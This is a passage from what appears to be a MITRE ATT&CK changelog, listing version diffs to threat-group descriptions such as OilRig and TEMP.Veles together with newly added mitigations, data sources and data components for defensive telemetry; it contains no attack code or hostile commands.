external_references[11]['url']https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing
x_mitre_version1.52.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Secureworks NICKEL ACADEMY Dec 2017', 'description': 'Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.', 'url': 'https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing'}

[G0049] OilRig

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of industries, including financial, governm>rgeted a variety of sectors, including financial, government
>ent, energy, chemical, and telecommunications, and has large>, energy, chemical, and telecommunications. It appears the g
>ly focused its operations within the Middle East. It appears>roup carries out supply chain attacks, leveraging the trust 
> the group carries out supply chain attacks, leveraging the >relationship between organizations to attack their primary t
>trust relationship between organizations to attack their pri>argets. FireEye assesses that the group works on behalf of t
>mary targets. FireEye assesses that the group works on behal>he Iranian government based on infrastructure details that c
>f of the Iranian government based on infrastructure details >ontain references to Iran, use of Iranian infrastructure, an
>that contain references to Iran, use of Iranian infrastructu>d targeting that aligns with nation-state interests. (Citati
>re, and targeting that aligns with nation-state interests. (>on: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig 
>Citation: Palo Alto OilRig April 2017) (Citation: ClearSky O>Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: P
>ilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citat>alo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 20
>ion: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook >17) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUA
>Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit >DAGENT July 2018)
>42 QUADAGENT July 2018) This group was previously tracked un 
>der two distinct groups, APT34 and OilRig, but was combined  
>due to additional reporting giving higher confidence about t 
>he overlap of the activity. 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 12:59:49.642000+00:002021-10-15 22:04:08.941000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
external_references[5]['description']This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Check Point APT34 April 2021', 'description': 'Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.', 'url': 'https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/'}
Minor Version Changes

[G0064] APT33

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-01 15:48:20.759000+00:002021-05-26 12:40:42.907000+00:00
x_mitre_version1.31.4

[G0035] Dragonfly

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-06 18:40:51.440000+00:002021-10-12 22:07:18.072000+00:00
x_mitre_version2.02.1

[G0034] Sandworm Team

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 13:13:09.511000+00:002021-10-15 21:46:19.437000+00:00
x_mitre_version2.02.1

[G0088] TEMP.Veles

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rust1[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Rus
>sia-based threat group that has targeted critical infrastruc>sia-based threat group that has targeted critical infrastruc
>ture. The group has been observed utilizing TRITON, a malwar>ture. The group has been observed utilizing [TRITON](https:/
>e framework designed to manipulate industrial safety systems>/attack.mitre.org/software/S0609), a malware framework desig
>.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Vele>ned to manipulate industrial safety systems.(Citation: FireE
>s 2018)(Citation: FireEye TEMP.Veles JSON April 2019)>ye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation:
 > FireEye TEMP.Veles JSON April 2019)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:34:04.242000+00:002021-10-17 14:49:09.631000+00:00
description[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)
external_references[2]['description']The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON.(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
external_references[8]['url']https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
x_mitre_version1.21.3
Other Version Changes

[G0074] Dragonfly 2.0

Current version: 2.1

Version changed from: 1.3 → 2.1


Old Description
New Description
t1[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a t1[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a 
>suspected Russian group that has targeted government entitie>suspected Russian group that has targeted government entitie
>s and multiple U.S. critical infrastructure sectors since at>s and multiple U.S. critical infrastructure sectors since at
> least March 2016. (Citation: US-CERT TA18-074A) (Citation: > least December 2015. (Citation: US-CERT TA18-074A) (Citatio
>Symantec Dragonfly Sept 2017) There is debate over the exten>n: Symantec Dragonfly Sept 2017) There is debate over the ex
>t of overlap between [Dragonfly 2.0](https://attack.mitre.or>tent of overlap between [Dragonfly 2.0](https://attack.mitre
>g/groups/G0074) and [Dragonfly](https://attack.mitre.org/gro>.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/
>ups/G0035), but there is sufficient evidence to lead to thes>groups/G0035), but there is sufficient evidence to lead to t
>e being tracked as two separate groups. (Citation: Fortune D>hese being tracked as two separate groups. (Citation: Fortun
>ragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )>e Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )
Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-15 20:14:58.980000+00:002021-10-14 20:07:00.932000+00:00
description[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )
x_mitre_version1.32.1

Mitigations

enterprise-attack

New Mitigations

[M1057] Data Loss Prevention

Current version: 1.0

Description: Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)

Data Sources

enterprise-attack

New Data Sources

[DS0026] Active Directory

Current version: 1.0

Description: A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)


[DS0015] Application Log

Current version: 1.0

Description: Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)


[DS0037] Certificate

Current version: 1.0

Description: A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications


[DS0025] Cloud Service

Current version: 1.0

Description: Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products)


[DS0010] Cloud Storage

Current version: 1.0

Description: Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)


[DS0031] Cluster

Current version: 1.0

Description: A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info)


[DS0017] Command

Current version: 1.0

Description: A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)


[DS0032] Container

Current version: 1.0

Description: A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container)


[DS0038] Domain Name

Current version: 1.0

Description: Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)


[DS0016] Drive

Current version: 1.0

Description: A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)


[DS0027] Driver

Current version: 1.0

Description: A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)


[DS0022] File

Current version: 1.0

Description: A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)(Citation: Microsoft File Mgmt)


[DS0018] Firewall

Current version: 1.0

Description: A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)


[DS0001] Firmware

Current version: 1.0

Description: Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI


[DS0036] Group

Current version: 1.0

Description: A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)


[DS0007] Image

Current version: 1.0

Description: A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)


[DS0030] Instance

Current version: 1.0

Description: A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM)


[DS0035] Internet Scan

Current version: 1.0

Description: Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet


[DS0008] Kernel

Current version: 1.0

Description: A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)


[DS0028] Logon Session

Current version: 1.0

Description: Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorizaton(Citation: Microsoft Audit Logon Events)


[DS0004] Malware Repository

Current version: 1.0

Description: Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries


[DS0011] Module

Current version: 1.0

Description: Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)


[DS0023] Named Pipe

Current version: 1.0

Description: Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)


[DS0033] Network Share

Current version: 1.0

Description: A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)


[DS0029] Network Traffic

Current version: 1.0

Description: Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)


[DS0021] Persona

Current version: 1.0

Description: A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims


[DS0014] Pod

Current version: 1.0

Description: A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)


[DS0009] Process

Current version: 1.0

Description: Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)


[DS0003] Scheduled Job

Current version: 1.0

Description: Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)


[DS0012] Script

Current version: 1.0

Description: A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)


[DS0013] Sensor Health

Current version: 1.0

Description: Information from host telemetry providing insights about system status, errors, or other notable functional activity


[DS0019] Service

Current version: 1.0

Description: A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)


[DS0020] Snapshot

Current version: 1.0

Description: A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)


[DS0002] User Account

Current version: 1.0

Description: A profile representing a user, device, service, or application used to authenticate and access resources


[DS0034] Volume

Current version: 1.0

Description: Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)


[DS0005] WMI

Current version: 1.0

Description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)


[DS0006] Web Credential

Current version: 1.0

Description: Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)


[DS0024] Windows Registry

Current version: 1.0

Description: A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)

Data Components

enterprise-attack

New Data Components

Domain Name: Active DNS

Current version: 1.0

Description: Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)


Active Directory: Active Directory Credential Request

Current version: 1.0

Description: A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)


Active Directory: Active Directory Object Access

Current version: 1.0

Description: Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)


Active Directory: Active Directory Object Creation

Current version: 1.0

Description: Initial construction of a new active directory object (ex: Windows EID 5137)


Active Directory: Active Directory Object Deletion

Current version: 1.0

Description: Removal of an active directory object (ex: Windows EID 5141)


Active Directory: Active Directory Object Modification

Current version: 1.0

Description: Changes made to an active directory object (ex: Windows EID 5163 or 5136)


Application Log: Application Log Content

Current version: 1.0

Description: Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)


Certificate: Certificate Registration

Current version: 1.0

Description: Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency)


Cloud Service: Cloud Service Disable

Current version: 1.0

Description: Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging)


Cloud Service: Cloud Service Enumeration

Current version: 1.0

Description: An extracted list of cloud services (ex: AWS ECS ListServices)


Cloud Service: Cloud Service Metadata

Current version: 1.0

Description: Contextual data about a cloud service and activity around it such as name, type, or purpose/function


Cloud Service: Cloud Service Modification

Current version: 1.0

Description: Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule)


Cloud Storage: Cloud Storage Access

Current version: 1.0

Description: Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject)


Cloud Storage: Cloud Storage Creation

Current version: 1.0

Description: Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket)


Cloud Storage: Cloud Storage Deletion

Current version: 1.0

Description: Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket)


Cloud Storage: Cloud Storage Enumeration

Current version: 1.0

Description: An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects)


Cloud Storage: Cloud Storage Metadata

Current version: 1.0

Description: Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner


Cloud Storage: Cloud Storage Modification

Current version: 1.0

Description: Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl)


Cluster: Cluster Metadata

Current version: 1.0

Description: Contextual data about a cluster and activity around it such as name, namespace, age, or status


Command: Command Execution

Current version: 1.0

Description: Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)


Container: Container Creation

Current version: 1.0

Description: Initial construction of a new container (ex: docker create )


Container: Container Enumeration

Current version: 1.0

Description: An extracted list of containers (ex: docker ps)


Container: Container Metadata

Current version: 1.0

Description: Contextual data about a container and activity around it such as name, ID, image, or status


Container: Container Start

Current version: 1.0

Description: Activation or invocation of a container (ex: docker start or docker restart)


Domain Name: Domain Registration

Current version: 1.0

Description: Information about domain name assignments and other domain metadata (ex: WHOIS)


Drive: Drive Access

Current version: 1.0

Description: Opening of a data storage device with an assigned drive letter or mount point


Drive: Drive Creation

Current version: 1.0

Description: Initial construction of a drive letter or mount point to a data storage device


Drive: Drive Modification

Current version: 1.0

Description: Changes made to a drive letter or mount point of a data storage device


Driver: Driver Load

Current version: 1.0

Description: Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)


Driver: Driver Metadata

Current version: 1.0

Description: Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking


File: File Access

Current version: 1.0

Description: Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)


File: File Creation

Current version: 1.0

Description: Initial construction of a new file (ex: Sysmon EID 11)


File: File Deletion

Current version: 1.0

Description: Removal of a file (ex: Sysmon EID 23)


File: File Metadata

Current version: 1.0

Description: Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.


File: File Modification

Current version: 1.0

Description: Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)


Firewall: Firewall Disable

Current version: 1.0

Description: Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)


Firewall: Firewall Enumeration

Current version: 1.0

Description: An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)


Firewall: Firewall Metadata

Current version: 1.0

Description: Contextual data about a firewall and activity around it such as name, policy, or status


Firewall: Firewall Rule Modification

Current version: 1.0

Description: Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)


Firmware: Firmware Modification

Current version: 1.0

Description: Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)


Group: Group Enumeration

Current version: 1.0

Description: An extracted list of available groups and/or their associated settings (ex: AWS list-groups)


Group: Group Metadata

Current version: 1.0

Description: Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group


Group: Group Modification

Current version: 1.0

Description: Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup)


Sensor Health: Host Status

Current version: 1.0

Description: Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)


Image: Image Creation

Current version: 1.0

Description: Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT)


Image: Image Deletion

Current version: 1.0

Description: Removal of a virtual machine image (ex: Azure Compute Service Images DELETE)


Image: Image Metadata

Current version: 1.0

Description: Contextual data about a virtual machine image such as name, resource group, state, or type


Image: Image Modification

Current version: 1.0

Description: Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)


Instance: Instance Creation

Current version: 1.0

Description: Initial construction of a new instance (ex: instance.insert within GCP Audit Logs)


Instance: Instance Deletion

Current version: 1.0

Description: Removal of an instance (ex: instance.delete within GCP Audit Logs)


Instance: Instance Enumeration

Current version: 1.0

Description: An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs)


Instance: Instance Metadata

Current version: 1.0

Description: Contextual data about an instance and activity around it such as name, type, or status


Instance: Instance Modification

Current version: 1.0

Description: Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs)


Instance: Instance Start

Current version: 1.0

Description: Activation or invocation of an instance (ex: instance.start within GCP Audit Logs)


Instance: Instance Stop

Current version: 1.0

Description: Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs)


Kernel: Kernel Module Load

Current version: 1.0

Description: An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls


Logon Session: Logon Session Creation

Current version: 1.0

Description: Initial construction of a new user logon session (ex: Windows EID 4624, /var/log/utmp, or /var/log/wmtp)


Logon Session: Logon Session Metadata

Current version: 1.0

Description: Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it


Malware Repository: Malware Content

Current version: 1.0

Description: Code, strings, and other signatures that compromise a malicious payload


Malware Repository: Malware Metadata

Current version: 1.0

Description: Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information


Module: Module Load

Current version: 1.0

Description: Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)


Named Pipe: Named Pipe Metadata

Current version: 1.0

Description: Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)


Network Traffic: Network Connection Creation

Current version: 1.0

Description: Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)


Network Share: Network Share Access

Current version: 1.0

Description: Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)


Network Traffic: Network Traffic Content

Current version: 1.0

Description: Logged network traffic data showing both protocol header and body values (ex: PCAP)


Network Traffic: Network Traffic Flow

Current version: 1.0

Description: Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)


Process: OS API Execution

Current version: 1.0

Description: Operating system function/method calls executed by a process


Domain Name: Passive DNS

Current version: 1.0

Description: Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS)


Pod: Pod Creation

Current version: 1.0

Description: Initial construction of a new pod (ex: kubectl apply|run)


Pod: Pod Enumeration

Current version: 1.0

Description: An extracted list of pods within a cluster (ex: kubectl get pods)


Pod: Pod Metadata

Current version: 1.0

Description: Contextual data about a pod and activity around it such as name, ID, namespace, or status


Pod: Pod Modification

Current version: 1.0

Description: Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit)


Process: Process Access

Current version: 1.0

Description: Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10)


Process: Process Creation

Current version: 1.0

Description: Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)


Process: Process Metadata

Current version: 1.0

Description: Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.


Process: Process Modification

Current version: 1.0

Description: Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8)


Process: Process Termination

Current version: 1.0

Description: Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)


Internet Scan: Response Content

Current version: 1.0

Description: Logged network traffic in response to a scan showing both protocol header and body values


Internet Scan: Response Metadata

Current version: 1.0

Description: Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports


Scheduled Job: Scheduled Job Creation

Current version: 1.0

Description: Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)


Scheduled Job: Scheduled Job Metadata

Current version: 1.0

Description: Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.


Scheduled Job: Scheduled Job Modification

Current version: 1.0

Description: Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)


Script: Script Execution

Current version: 1.0

Description: Launching a list of commands through a script file (ex: Windows EID 4104)


Service: Service Creation

Current version: 1.0

Description: Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)


Service: Service Metadata

Current version: 1.0

Description: Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.


Service: Service Modification

Current version: 1.0

Description: Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)


Snapshot: Snapshot Creation

Current version: 1.0

Description: Initial construction of a new snapshot (ex: AWS create-snapshot)


Snapshot: Snapshot Deletion

Current version: 1.0

Description: Removal of a snapshot (ex: AWS delete-snapshot)


Snapshot: Snapshot Enumeration

Current version: 1.0

Description: An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots)


Snapshot: Snapshot Metadata

Current version: 1.0

Description: Contextual data about a snapshot, which may include information such as ID, type, and status


Snapshot: Snapshot Modification

Current version: 1.0

Description: Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute)


Persona: Social Media

Current version: 1.0

Description: Established, compromised, or otherwise acquired social media personas


User Account: User Account Authentication

Current version: 1.0

Description: An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4625 or /var/log/auth.log)


User Account: User Account Creation

Current version: 1.0

Description: Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs)


User Account: User Account Deletion

Current version: 1.0

Description: Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs)


User Account: User Account Metadata

Current version: 1.0

Description: Contextual data about an account, which may include a username, user ID, environmental data, etc.


User Account: User Account Modification

Current version: 1.0

Description: Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs)


Volume: Volume Creation

Current version: 1.0

Description: Initial construction of a cloud volume (ex: AWS create-volume)


Volume: Volume Deletion

Current version: 1.0

Description: Removal of a a cloud volume (ex: AWS delete-volume)


Volume: Volume Enumeration

Current version: 1.0

Description: An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes)


Volume: Volume Metadata

Current version: 1.0

Description: Contextual data about a cloud volume and activity around it, such as id, type, state, and size


Volume: Volume Modification

Current version: 1.0

Description: Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)


WMI: WMI Creation

Current version: 1.0

Description: Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)


Web Credential: Web Credential Creation

Current version: 1.0

